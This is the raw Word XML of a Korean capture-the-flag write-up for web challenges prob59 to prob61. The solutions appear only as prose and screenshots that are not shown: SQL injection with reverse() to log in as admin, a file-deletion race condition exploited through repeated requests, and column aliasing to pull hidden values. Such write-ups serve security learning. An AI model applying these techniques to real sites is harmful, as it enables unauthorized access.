      <w:r w:rsidRPr="00D952AC">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob59</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D952AC" w:rsidRDefault="00D952AC" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FF593B6" wp14:editId="252709CA">
            <wp:extent cx="5400675" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="9525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AC" w:rsidRDefault="00D952AC" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F1A611F" wp14:editId="644D454D">
            <wp:extent cx="5731510" cy="1160145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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AC" w:rsidRDefault="00D952AC" w:rsidP="008460CC">
      <w:r>
        <w:t>id, phone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 </w:t>
      </w:r>
      <w:r>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">하고 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lid, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lphone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 </w:t>
      </w:r>
      <w:r>
        <w:t>log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한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D952AC" w:rsidRDefault="00D952AC" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62A007CF" wp14:editId="43F7458E">
            <wp:extent cx="5731510" cy="3883660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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BA" w:rsidRDefault="00B64400" w:rsidP="008460CC">
      <w:r>
        <w:t>admin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진수로 바꿔 입력하려 했지만 길이 제한과 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>magic_quotes_gpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>때문에 하지 못했다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003350C" w:rsidRDefault="0003350C" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79565EE4" wp14:editId="5529B92F">
            <wp:extent cx="5429250" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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C" w:rsidRDefault="0003350C" w:rsidP="008460CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이렇게 하면 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nimda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">elect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할 때 l</w:t>
      </w:r>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r>
        <w:t>reverse(id)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003350C" w:rsidRDefault="0003350C" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16926303" wp14:editId="1F993989">
            <wp:extent cx="5731510" cy="1992630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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C" w:rsidRPr="0003350C" w:rsidRDefault="0003350C" w:rsidP="0003350C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003350C">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>prob60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003350C" w:rsidRDefault="0003350C" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72061E93" wp14:editId="2D32D730">
            <wp:extent cx="1400175" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="9525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C" w:rsidRDefault="0003350C" w:rsidP="008460CC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>들어가자마자</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Access Denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 뜬다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00755856" w:rsidRDefault="00755856" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D5EF4AF" wp14:editId="1E61B9B9">
            <wp:extent cx="5731510" cy="4161155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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56" w:rsidRDefault="00755856" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A6E3125" wp14:editId="136799DE">
            <wp:extent cx="5731510" cy="3037205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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56" w:rsidRDefault="00755856" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>HPSESSID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 숫자를 뺀 아무거나 입력을 하고 로그인을 해서 문제로 들어가면 </w:t>
      </w:r>
      <w:r>
        <w:t>hi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>라고 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00755856" w:rsidRDefault="008D62AF" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>EMOTE_ADDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 1</w:t>
      </w:r>
      <w:r>
        <w:t>27.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 아니라면 파일을 삭제한다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그러므로 파일을 열어서 </w:t>
      </w:r>
      <w:r>
        <w:t>auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 진행할 수 없다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">하지만 삭제하기 전에 </w:t>
      </w:r>
      <w:r>
        <w:t>sleep(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 한다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그렇다면 그 </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">초 동안 파일을 읽어서 </w:t>
      </w:r>
      <w:r>
        <w:t>auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 진행하면 될 것이다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(웹 레이스 컨디션)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D62AF" w:rsidRDefault="006B39FF" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EC3FC12" wp14:editId="2CD3262B">
            <wp:extent cx="5229225" cy="4238625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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66">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79160D11" wp14:editId="3EF04B16">
            <wp:extent cx="5200650" cy="3324225"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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66" w:rsidRDefault="007D1D66" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿠키 값이 다른 두 아이디,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>즉 C</w:t>
      </w:r>
      <w:r>
        <w:t>hrome, IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 두 개를 키고 </w:t>
      </w:r>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 계속 보낸다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D1D66" w:rsidRDefault="007D1D66" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59D41145" wp14:editId="70E2536B">
            <wp:extent cx="4610100" cy="2714625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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66" w:rsidRDefault="007D1D66" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A11F2EB" wp14:editId="3741B0B7">
            <wp:extent cx="4572000" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="0" b="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66" w:rsidRDefault="007D1D66" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그럼 문제가 풀린다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D1D66" w:rsidRPr="007D1D66" w:rsidRDefault="007D1D66" w:rsidP="007D1D66">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D1D66">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="007D1D66">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob61</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D1D66" w:rsidRDefault="007D1D66" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67D4A874" wp14:editId="28D2E112">
            <wp:extent cx="5731510" cy="2939415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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27" w:rsidRDefault="00105A27" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B3B4BB2" wp14:editId="1159E5AE">
            <wp:extent cx="4886325" cy="838200"/>
            <wp:effectExtent l="0" t="0" r="9525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27" w:rsidRDefault="00105A27" w:rsidP="008460CC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변수에 </w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 넣으니 </w:t>
      </w:r>
      <w:r>
        <w:t>zombie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105A27" w:rsidRDefault="00105A27" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4772ACBF" wp14:editId="38B111C4">
            <wp:extent cx="4133850" cy="1924050"/>
            <wp:effectExtent l="0" t="0" r="0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27" w:rsidRDefault="00105A27" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이런 식으로 칼럼 명은 </w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 하는데 다른 값을 뽑을 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105A27" w:rsidRPr="0003350C" w:rsidRDefault="00105A27" w:rsidP="008460CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68AFC790" wp14:editId="2461CAFD">
            <wp:extent cx="5731510" cy="2872105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>prob62 ~ prob66</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008460CC" w:rsidRDefault="008460CC" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제</w:t>
      </w:r>
      <w:r w:rsidR="00105A27">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 아예 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00105A27">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>안들어가짐</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00105A27" w:rsidRDefault="00105A27" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74C5F6B0" wp14:editId="222282AF">
            <wp:extent cx="5731510" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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27" w:rsidRPr="008460CC" w:rsidRDefault="00105A27" w:rsidP="00105A27">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>LL CLEAR</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00105A27" w:rsidRPr="008460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B4E2F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5750027C"/>
    <w:lvl w:ilvl="0" w:tplc="F2D8E212">
      <w:start w:val="207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1F7690"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9D8AC9E"/>
    <w:lvl w:ilvl="0" w:tplc="7338C65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07"/>
    <w:rsid w:val="000101BD"/>
    <w:rsid w:val="000230F1"/>
    <w:rsid w:val="0003350C"/>
    <w:rsid w:val="00052619"/>
    <w:rsid w:val="0008097E"/>
    <w:rsid w:val="00085BEA"/>
    <w:rsid w:val="000A15A9"/>
    <w:rsid w:val="000A2E4E"/>
    <w:rsid w:val="000A732F"/>
    <w:rsid w:val="000B1ADE"/>
    <w:rsid w:val="000D2B6B"/>
    <w:rsid w:val="000E0899"/>
    <w:rsid w:val="00105A27"/>
    <w:rsid w:val="00145BAE"/>
    <w:rsid w:val="00155D57"/>
    <w:rsid w:val="00166BBE"/>
    <w:rsid w:val="001742CE"/>
    <w:rsid w:val="00195AC0"/>
    <w:rsid w:val="001B7918"/>
    <w:rsid w:val="001E0DDA"/>
    <w:rsid w:val="001E264E"/>
    <w:rsid w:val="001E585B"/>
    <w:rsid w:val="00221413"/>
    <w:rsid w:val="00221E88"/>
    <w:rsid w:val="00223F45"/>
    <w:rsid w:val="00224D1E"/>
    <w:rsid w:val="0029121F"/>
    <w:rsid w:val="002A6ED7"/>
    <w:rsid w:val="002A72E2"/>
    <w:rsid w:val="002B2410"/>
    <w:rsid w:val="002B2971"/>
    <w:rsid w:val="002C6379"/>
    <w:rsid w:val="002E1146"/>
    <w:rsid w:val="002E3946"/>
    <w:rsid w:val="002F582E"/>
    <w:rsid w:val="00305874"/>
    <w:rsid w:val="00313B3A"/>
    <w:rsid w:val="00316360"/>
    <w:rsid w:val="00337D91"/>
    <w:rsid w:val="00346FBA"/>
    <w:rsid w:val="003831B6"/>
    <w:rsid w:val="00392763"/>
    <w:rsid w:val="003E519C"/>
    <w:rsid w:val="00414F59"/>
    <w:rsid w:val="00423F79"/>
    <w:rsid w:val="00441260"/>
    <w:rsid w:val="00450104"/>
    <w:rsid w:val="00461BD3"/>
    <w:rsid w:val="00465E78"/>
    <w:rsid w:val="00477516"/>
    <w:rsid w:val="0048524A"/>
    <w:rsid w:val="004918FE"/>
    <w:rsid w:val="004A0AE8"/>
    <w:rsid w:val="004A40B5"/>
    <w:rsid w:val="004A64F3"/>
    <w:rsid w:val="004B7047"/>
    <w:rsid w:val="004D318B"/>
    <w:rsid w:val="004E5310"/>
    <w:rsid w:val="004F6C79"/>
    <w:rsid w:val="004F75F1"/>
    <w:rsid w:val="00512CFA"/>
    <w:rsid w:val="00516200"/>
    <w:rsid w:val="00516475"/>
    <w:rsid w:val="0051675D"/>
    <w:rsid w:val="00516B31"/>
    <w:rsid w:val="00526CAB"/>
    <w:rsid w:val="00530F70"/>
    <w:rsid w:val="00571B1D"/>
    <w:rsid w:val="005740C0"/>
    <w:rsid w:val="005854B9"/>
    <w:rsid w:val="005A0902"/>
    <w:rsid w:val="005B1A63"/>
    <w:rsid w:val="005B2F1A"/>
    <w:rsid w:val="005B6778"/>
    <w:rsid w:val="005C3B29"/>
    <w:rsid w:val="005C5FB3"/>
    <w:rsid w:val="005D7AF8"/>
    <w:rsid w:val="005E6519"/>
    <w:rsid w:val="005E70BD"/>
    <w:rsid w:val="005F7541"/>
    <w:rsid w:val="00647F02"/>
    <w:rsid w:val="00652817"/>
    <w:rsid w:val="006B39FF"/>
    <w:rsid w:val="00741A15"/>
    <w:rsid w:val="007513FF"/>
    <w:rsid w:val="00755856"/>
    <w:rsid w:val="00791DD4"/>
    <w:rsid w:val="007A1C45"/>
    <w:rsid w:val="007B061C"/>
    <w:rsid w:val="007B3AFB"/>
    <w:rsid w:val="007C514D"/>
    <w:rsid w:val="007D1D66"/>
    <w:rsid w:val="007F7C7F"/>
    <w:rsid w:val="00820856"/>
    <w:rsid w:val="008460CC"/>
    <w:rsid w:val="00853348"/>
    <w:rsid w:val="008B7B49"/>
    <w:rsid w:val="008D62AF"/>
    <w:rsid w:val="008E7E72"/>
    <w:rsid w:val="00901E49"/>
    <w:rsid w:val="00931E73"/>
    <w:rsid w:val="009362BA"/>
    <w:rsid w:val="00967E95"/>
    <w:rsid w:val="009777A0"/>
    <w:rsid w:val="00992250"/>
    <w:rsid w:val="009F6F7E"/>
    <w:rsid w:val="00A03D63"/>
    <w:rsid w:val="00A306D1"/>
    <w:rsid w:val="00A436F8"/>
    <w:rsid w:val="00A43782"/>
    <w:rsid w:val="00A4490A"/>
    <w:rsid w:val="00A5158B"/>
    <w:rsid w:val="00A51C7C"/>
    <w:rsid w:val="00A85C13"/>
    <w:rsid w:val="00AA522D"/>
    <w:rsid w:val="00B00DBB"/>
    <w:rsid w:val="00B11C0A"/>
    <w:rsid w:val="00B139C7"/>
    <w:rsid w:val="00B641FC"/>
    <w:rsid w:val="00B64400"/>
    <w:rsid w:val="00B71A9B"/>
    <w:rsid w:val="00BA1AF2"/>
    <w:rsid w:val="00BF786F"/>
    <w:rsid w:val="00C32F4F"/>
    <w:rsid w:val="00C3598A"/>
    <w:rsid w:val="00C904A6"/>
    <w:rsid w:val="00CB211A"/>
    <w:rsid w:val="00CC2134"/>
    <w:rsid w:val="00CC4FE1"/>
    <w:rsid w:val="00CD7CBE"/>
    <w:rsid w:val="00CF6D1A"/>
    <w:rsid w:val="00D13C25"/>
    <w:rsid w:val="00D216CA"/>
    <w:rsid w:val="00D25D0C"/>
    <w:rsid w:val="00D33709"/>
    <w:rsid w:val="00D547A9"/>
    <w:rsid w:val="00D93FC3"/>
    <w:rsid w:val="00D952AC"/>
    <w:rsid w:val="00DA0F2B"/>
    <w:rsid w:val="00DB1207"/>
    <w:rsid w:val="00DB7A14"/>
    <w:rsid w:val="00DF2212"/>
    <w:rsid w:val="00E0551C"/>
    <w:rsid w:val="00E96484"/>
    <w:rsid w:val="00EC177B"/>
    <w:rsid w:val="00EC186D"/>
    <w:rsid w:val="00EC5183"/>
    <w:rsid w:val="00EE3AB9"/>
    <w:rsid w:val="00EE4B25"/>
    <w:rsid w:val="00EF696E"/>
    <w:rsid w:val="00F1752D"/>
    <w:rsid w:val="00F402E0"/>
    <w:rsid w:val="00F45BCE"/>
    <w:rsid w:val="00F6585E"/>
    <w:rsid w:val="00F8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5883"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5CB0C80D-8E4B-42B8-A5AA-C76C52D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41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12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B12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641FC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Book Title"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="0065281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652817"/>
    <w:pPr>
      <w:ind w:leftChars="400" w:left="800"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="000A15A9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00A306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인용 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00A306D1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BA1A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fontTable" Target="fontTable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5169-F75E-42D9-A308-F8391ED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112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조</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>정 성조</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-28T00:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-02T09:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>